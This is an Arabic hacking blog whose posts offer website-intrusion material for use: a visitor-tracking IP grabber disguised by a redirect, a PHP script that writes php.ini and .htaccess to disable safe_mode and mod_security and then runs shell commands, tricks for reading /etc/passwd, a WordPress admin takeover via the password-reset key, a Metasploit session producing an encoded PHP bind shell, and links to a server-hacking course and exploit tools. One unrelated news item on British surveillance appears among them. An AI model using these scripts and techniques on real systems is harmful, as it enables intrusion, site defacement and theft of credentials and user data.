المشاركات الشائعة

d

Solo copea el codigo y dirigete a diseño/Html y pegas el codigo
Solo copea el codigo y dirigete a diseño/Html y pegas el codigo

لإستماع للقرأن الكريم

عدد ضيوف الموقع

sild

آخر التعليقات

‏إظهار الرسائل ذات التسميات هاكر أخلاقي. إظهار كافة الرسائل
‏إظهار الرسائل ذات التسميات هاكر أخلاقي. إظهار كافة الرسائل

الثلاثاء، 22 يوليو 2014

جلب و سحب Ip و إصدار النظام و المتصفح برمجيا

السلام عليكم و رحمات الله تعالى و يركتاه سكريبت من برمجتي بيسط وظيفته سحب الأيبي و معلما النظام و إصدار المتصفح و حفظه
في ملف txt ..طيف كيف الإستخدام تحتاج إلى مساحة شيل cpanel تقدر تجربها على اللوكل الهوست بيع حفظ الملف بصيفة php

عند فتح سوف يتحول تقائيا المستخدم إلى جوجل تقدر تغيره غلى أي موقع فقظ هدا كشكل من اشكال التمويه :) وبدها سوف ينشء ملف بإسم ip_Log.txt عند فتح سوف تجد المعلومات التي تريدها سلام ..














DOwnload: 

الخميس، 17 يوليو 2014

Aplha Security v1.5


السلام عليكم ورحمة الله وبركاته 

لقد قمت ببرمج سكريبت صغير ‘إن شاء الله يعجبكم و جربوه و اعطونا رأيكم فيه 



http://www.exploit4arab.net/exploits/867

Simple Md5 & Sha1 Generator



Hi Guys i hope you are ok al hmdlouh i make small script generat

any value to Md5 & Sha1 alghotim 

Take a look


After generation 


http://www.exploit4arab.net/exploits/878

الأربعاء، 11 سبتمبر 2013

Smart Hunter v.1.4.3 New Version

Smart Hunter v.1.4.3 Puplick Version

Credit goes to .:BK:. For Nice Tool












Video Presentation of version 1.2

http://www.youtube.com/watch?v=vbnSBNTxXbM


Download Smart Hunter


http://www.mediafire.com/?4vzcbm1j7imq14d

الخميس، 29 أغسطس 2013

دورة رائعة جدا في إختراق المواقع




السلام عليكم و رحمات الله تعالى و بركتاه اليوم و انا أتجول في الأنترنت وجدت دورة رائعةجدا في إختراق


المواقع 
دورة رائعة جدا في إختراق المواقع إن شاء الله تعجبكم :)








see you :)

الأربعاء، 28 أغسطس 2013

آبحث عن ثغرات وانت مرررتآآح ..





الســلآم عليكـم ورحمة الله وبركـآته ~..

مبــَآإْرك عليكـمْ الشهـرٍ ~ْ ...

هنـآ موقعيــن ~..محركـآت بحث للثغرآت ~ الصراحه مـآشفتهـآ بـ مواقعنـآ العربيــه قبل كذا .. ~ وقمــه في الروعـه ..

حط السكربت اللي تبحث عن ثغرتــه ~.. ويبحث لك في جميع موآقع السيكيورتي .. وانت مرتـآإْح


http://www.shodanhq.com/exploits/

الثـآني ~,

http://www.exploitsearch.net

جربوهـآ ~ وأعطوني رأيكــمْ ^_^

في أمـآن الله ~ دعوآتكــم ..

الأحد، 25 أغسطس 2013

للمستوى متوسط ومبتدأ { أسطوانة ShArK009 لاحتراف اختراق المواقع والسيرفرات}


إن الحمد لله نحمده ونستعينه ونستغفره ونعوذ بالله من شرور أنفسنا
وسيئات أعمالنا من يهد الله فلا مضل له ومن يضلل فلا هادى له
وأشهد أن لا إله إلا الله وحده لا شريك له وأن محمداًَ عبده ورسوله
أما بعد




بدورة لحتراف اختراق المواقع والسرفرات وباللغة العربية وهي موجهة للمستوى (مبتدأ و متوسط)
أما المتقدمين فلا تقدم لهم سوى اعادة انعاش لداكرتهم
والسبب الدي يجعل هده الدورة موجهة لهم هو
زيادة الثقة بنفسي عندما أعلم أن الهاكرز المتقدمين قد أعجبوا بالاسطوانة



كان من المفروض أن أنهي الدورة في نهاية العام 2011 لكن بسبب بعض طروف لم أستطع ولكن الحمد لله تم الانتهاء منها

الدورة مكون من 30 درسا على شكل فيديو وتتكون من


1 - الأساسيات والمصطلحات
2 
- شرح الشيل  
3 
- اوامر الشيل والصلاحيات والتصاريح
4 
- استهداف المواقع وكشف السكربيات المركبة + استخراج ملفات الموقع ولوحة التحكم باداة Linkrot
5 
- استثمار الثغرات المكتوبة بال html  
6 
- استثمار الثغرات المكتوبة بال Perl  
7 
- استثمار الثغرات المكتوبة بال PHP    
8 
- استثمار الثغرات المكتوبة بال PythOn
9 
- استثمار الثغرات المكتوبة بالـ ruby  
10 
- استغلال ثغرات sql  
11 
- استغلال ثغرات RFI  
12 
- استغلال ثغرات LFI  ورفع شل به Forbidden مع حل مشكلة خطأ  
13 
- استغلال ثغرات RFU  
14 
- استغلال ثغرات XSS  
15 
- الاتصال بالقاعدة وتغيير الاندكس من خلال الشيل و Cpanel
16 
- اهمية ملف config و htaccess  
17 
- تخطي صلاحيات اليوزر  - التنقل بصلاحيات اليوزر  
18 
- تخطي السيف مود أون  Safe_mode ON  
19 
- شرح رفع شيل من لوحة الادارة لـ joomla & vBulletin - wordpress    
20 
- استخراج حسابات Cpanel
21 
- استخراج ملفات config السيرفر | بطريقتين | 22 - استخراج ملفات  المنتديات  config /  Symlink
23 
- تشفير وفك تشفير ملفات basee64 - md5  
24 
- فك تشفير Zend
25 
- الاتصال العكسي بالسيرفر    
26 
- كيفية الحصول على الرروت
27 
- إختراق سيرفرات الويندوز  
28 
- التخفي في النت
29 
- كيفية تسجيل الانجازات بالزون اتش  
30 
- ftp (Port21) brute force + كشف البورتات المفتوحة على السيرفر  : brute force  
وقد قمت بحمع الدروس في اسطوانة أتمنى أن تعجبكم








الان جاء وقت التحميل

قمت برفعها على محبوب الملايين الميديافير برابط واحد

حجمه 130 Mo



http://www.mediafire.com/?busuyxg2uarab9e



دعواتكم لي بالتوفيق


في أمان الله

الاندبندنت: بريطانيا تدير قاعدة تجسس سرية بالشرق الأوسط


كشفت صحيفة الاندبندنت البريطانية اليوم أن الوثائق التي سربها الموظف السابق في الاستخبارات الأميركية ادوارد سنودن تشير إلى أن بريطانيا تدير قاعدة تجسس سرية في الشرق الأوسط بالنيابة عن وكالات الاستخبارات الغربية تقوم بالتنصت على الاتصالات الهاتفية ومراقبة الرسائل الالكترونية.

وأضافت الصحيفة أن القاعدة التي لم يتم تحديد موقعها تجمع المعلومات وترسلها إلى المركز الحكومي للاتصالات في بريطانيا وتشاركها ايضا مع وكالة الأمن القومي الأميركية.

وأشارت الصحيفة إلى أن السلطات البريطانية تعتبر قاعدة التجسس هذه عنصرا أساسيا في الحرب على الإرهاب حيث تلعب دور "منظومة إنذار مبكر عن الأخطار الممكنة في العالم".

وأضافت أن صحيفة الغارديان البريطانية وافقت على تقييد نشر وثائق سنودن ومنع نشر أي وثائق تمس الأمن القومي البريطاني واضطرت إلى إتلاف جهاز كومبيوتر احتوى نسخا من ملفات سنودن وذلك بعد أن أرسل رئيس الوزراء البريطاني ديفيد كاميرون أحد مساعديه من أجل الضغط على صحيفة الغارديان كي تتلف الوثائق السرية التي حصلت عليها من سنودن.

وقالت الاندبندنت إن الشخص الذي مارس الضغوط على صحيفة الغارديان هو جيريمي هايوود كما قام موظفان بريطانيان كبيران بالضغط على إدارة الغارديان كي تتلف الوثائق حيث قاما بزيارة للصحيفة وأكدا خلالها بوضوح أنهما جاءا باسم أعلى سلطة للمطالبة بتسلم ملفات سنودن الموجودة لدى الصحيفة على الفور.

يذكر أن سنودن سرب معلومات سرية كشفت وجود نظام مراقبة ضخم للولايات المتحدة وبريطانيا على العالم وواجهت صحيفة الغارديان البريطانية ضغوطا كبيرة لإتلاف الوثائق السرية التي حصلت عليها من سنودن حيث قامت بإتلاف الأقراص الصلبة أمام خبراء أمنيين من جهاز التصنت البريطاني في عملية وصفتها بأنها "خطوة رمزية عبثية جدا" لأن هناك نسخا اخرى بحيازة صحف أميركية وبرازيلية.

مواقع لتنزيل السكربتات وفحصها


بسم الله الرحمن الرحيم

اليوم اقدم لكم مواقع
لتنزيل السكربتات وفحصها

واحد هيقول ايه فائدتها ؟؟؟


مثلا انا فحصت موقع الصاعقة ولقيته مركب سكربت asp هما كان نوعه

ادخل على الموقع واحمل السكربت وافحصه سواء ببرامج او يدوى

واستغل الخطا واخترق من خلاله الموقع

وهذه بعض المواقع

www.opensourcescripts.com
www.hotscripts.com
www.gscripts.net
www.phpjunkyard.com
www.sitescripts.com/PHP
www.scriptsbank.com/PHP_Scripts/index.html
www.free-php.net
www.zsz.jp/script
www.hot-php-scripts.com
www.scriptcopy.com
www.dbscripts.net
www.gentlesource.com

تحياتى لكم

لتصبح متخفي كأنك في المحيط


السلام عليكم ورحمة الله وبركاته 

الاغلب لا يهتم بالتخفي رغم اتي اعتقد ان التخفي اهم من الهكر ( محشش )لتصبح متخفي كأنك المحيط


حلو 

نبدأ على البركة 

اولا هناك بما يسمى تسرب الDNS

هذا التسرب يكشف موقعك ولو استخدمت بروكسي 

يعني انتم الان لو تستخدموا الف بركسي اقدر احدد موقعكم وشكل بيتكم 



ببدأ بالتخفي وكشف التسرب !

هناك موقع يقوم بهذي العملية 
http://www.dnsleaktest.com/

اضغط 
check

ثم سيظهر لك !

عنوان البركسي وعنوان الايبي الخاص فيك ( الموزع )

من هنا انت ( عليك تنتحر احسن لك )

الحل هو يا شباب 
حملوا هذا الملف
http://www.dnsleaktest.com/dnsfixsetup.e x e

ثم شغلوه 

ثم اعد الاتصال بالبركسي 

واعد العملية !!

النتيجة :- لا تسرب في الdns

بكذا انت مخفي والانترنت لم يتأثر ابدا 

انتهى الموضوع هنا 

++++++++++++++++++++++++++++++++++++

[#~] برنامج خاص بكشف تغرات السكريبتات [#~]


السلام عليكم و رحمة الله تعالى و بركاته ~
اليوم حبيت اضع بين إيديكم برنامج صغير جدا لكن جميل يقوم بعمل سكان للسكريبتات و يطلع لكم تغرات السكريبت و بالتالي تستغلها #
البرنامج قديم شوي لكن لازلت استخدم و قوي كما العادة 
رابط التحميل :



http://www.mediafire.com/download/p5zesa0uhb4eofq/JAAScoisX-Code.rar  

السبت، 24 أغسطس 2013

طريقة تجاوز تشفير باسووردات الووردبريس


كيفكم يا حبااااااااااااااااااااايب قلبى
ان شاء الله من تقدم الى تقدم فى هذا المنتدى العريق

اطرح لكم اليوم طريقة لتجاوز تشفير باسوردات الوورد بريس المعقدة

فلنبدا على بركة الله

الطريقة بسيطة وشغالة مليون فى الميه

1- روح لرابط الادمن

http://www.example.com/wp-admin


2- اضغط على فقدان كلمة المرور او Lost your password?
3- جيب ايميل الادمن او ممكن باليوزر نيم هتلتقيه موجود فى (
موجودة بجدول wp-user)

وبعد ما تطلب كلمة المرور

اعمل ريفريش وجيب كود من العامود user_activation_key

وادخل على الرابط دا :


http://www.example.com/wp-login.php?action=rp&key=123456789&login=adminusername




طبعا
adminusername=يوزر نيم الادمن
key=الكود اللي جبته من
user_activation_key


وبكدا انت تقدر تعمل باسورد جديد للادمن

تحياتى 

اخوكم فى الله

سكريبت يتخطى حماية 70%

السلام عليكم

معي سكريبت يتخطى حماية 70%


<?
/*

Bypass ModeSecurity Exploit

*/
echo "<b><font color='green'>[+] Start...<br>\n";
$bypfile=fopen('php.ini','w+');
$stuffile=fopen('.htaccess','w+');

if(
$bypfile and $stuffile!= NULL){

echo 
"[+] Fucking Bypass Created Succes !<br> \n";

}

else{

echo 
"<font color='red'>[-] access denial ! <br></font> \n";

}
$byprullz1="safe_mode = OFF

"
;
$byprullz2="disable_functions = NONE";
$dj=fwrite($bypfile,$byprullz1);
$dj1=fwrite($bypfile,$byprullz2);
fclose($bypfile);

if(
$dj and $dj1!= NULL){

echo 
"[+] php.ini Writed ! <br>\n";

}

else{

echo 
"<font color='red'>[-] 404 php.ini not found !<br></font> \n";

}
$breakrullz="Options Indexes FollowSymLinks
DirectoryIndex vbspiders.htm
AddType txt .php
AddHandler txt .php
<IfModule mod_autoindex.c>
IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
</ifModule>
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>"
; // xD
$sf7=fwrite($stuffile,$breakrullz);
fclose($stuffile);

if(
$sf7!= NULL){

echo 
"<font color='green'>[+] EviL .htaccess Writing ....Done<br>\n";

echo 
"<font color='orange'>[+] Exploited Success!<br><br><br> \n\n\n";

echo 
"\t\t\t<font color='green'>[+] Edited By Aghilas -- Algeria <br>\n";
echo 
"\t\t\t<font color='green'>[+] Wr!ted By Hunter<br><br>\n";
echo 
"\t\t\t<font color='gray'> [+] somme errors was edited by aghilas  <br>\n";

echo 
"\t\t\t<font color='blue'>[+] Greetz : ALL My Friends ...\n";

}

else{

echo 
"<font color='red'>[-] Evil .htaccess Not FouNd!</font>\n";

}
system("uname -a;pwd");
#EOF
?>

Bypass cat /etc/passwd

السلام عليكم

بدون مقدمات
لو واجهت عدم قرائة الأمر
cat /etc/passwd
جرب هده الأوامر 

========================

كود:
xxd /etc/passwd
rev /etc/passwd
tac /etc/passwd
more /etc/passwdless /etc/passwd

أقوى دورة لإكتشاف ثغرات الفيض


أقوى دورة لإكتشاف ثغرات الفيض :

http://www.mediafire.com/download/ymnmiamo1wl/Basic+Stack+BOF+%3D--+Crashing+%26+exploiting+%26+make+it+universall.rar


ثغرات buffer overflow تفيد جدا في اختراق السيرفرات لانه يتم استغلال ثغرات البرامج المركبة (المصابة)


Enjoy my Friend

الخميس، 22 أغسطس 2013

metasploit php shell


  1.                                   _
  2.                                  | |      o
  3.  _  _  _    _ _|_  __,   ,    _  | |  __    _|_
  4. / |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  5.   |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
  6.                            /|
  7.                            \|
  8.        =[ metasploit v3.5.2-beta [core:3.5 api:1.0]
  9. + -- --=[ 644 exploits - 328 auxiliary
  10. + -- --=[ 216 payloads - 27 encoders - 8 nops
  11.        =[ svn r11722 updated 4 days ago (2011.02.08)
  12. msf > search php
  13. [*] Searching loaded modules for pattern 'php'...
  14. <--BIG SNIP-->
  15. NOP Generators
  16. ==============
  17.    Name         Disclosure Date  Rank    Description
  18.    ----         ---------------  ----    -----------
  19.    php/generic                   normal  PHP Nop Generator
  20. Payloads
  21. ========
  22.    Name                         Disclosure Date  Rank    Description
  23.    ----                         ---------------  ----    -----------
  24.    php/bind_perl                                 normal  PHP Command Shell, Bind TCP (via perl)
  25.    php/bind_php                                  normal  PHP Command Shell, Bind TCP (via php)
  26.    php/download_exec                             normal  PHP Executable Download and Execute
  27.    php/exec                                      normal  PHP Execute Command
  28.    php/meterpreter/bind_tcp                      normal  PHP Meterpreter, Bind TCP Stager
  29.    php/meterpreter/reverse_tcp                   normal  PHP Meterpreter, PHP Reverse TCP stager
  30.    php/meterpreter_reverse_tcp                   normal  PHP Meterpreter, Reverse TCP Inline
  31.    php/reverse_perl                              normal  PHP Command, Double reverse TCP connection (via perl)
  32.    php/reverse_php                               normal  PHP Command Shell, Reverse TCP (via php)
  33.    php/shell_findsock                            normal  PHP Command Shell, Find Sock
  34. msf > use php/bind_php
  35. msf payload(bind_php) > show options
  36. Module options (payload/php/bind_php):
  37.    Name   Current Setting  Required  Description
  38.    ----   ---------------  --------  -----------
  39.    LPORT  4444             yes       The listen port
  40.    RHOST                   no        The target address
  41. msf payload(bind_php) > set RHOST 192.168.1.5
  42. RHOST => 192.168.1.5
  43. msf payload(bind_php) > set LPORT 4321
  44. LPORT => 4321
  45. msf payload(bind_php) > generate -h
  46. Usage: generate [options]
  47. Generates a payload.
  48. OPTIONS:
  49.     -E        Force encoding.
  50.     -b <opt>  The list of characters to avoid: '\x00\xff'
  51.     -e <opt>  The name of the encoder module to use.
  52.     -f <opt>  The output file name (otherwise stdout)
  53.     -h        Help banner.
  54.     -i <opt>  the number of encoding iterations.
  55.     -k        Keep the template executable functional
  56.     -o <opt>  A comma separated list of options in VAR=VAL format.
  57.     -p <opt>  The Platform for output.
  58.     -s <opt>  NOP sled length.
  59.     -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
  60.     -x <opt>  The executable template to use
  61. msf payload(bind_php) > generate -t raw -e php/base64
  62. eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->
  63. msf payload(bind_php) > exit
  64. root@pentest101-desktop:/var/www# echo '<?php eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK)); ?>' > bind.php

    sec-worldweb.blogspot.com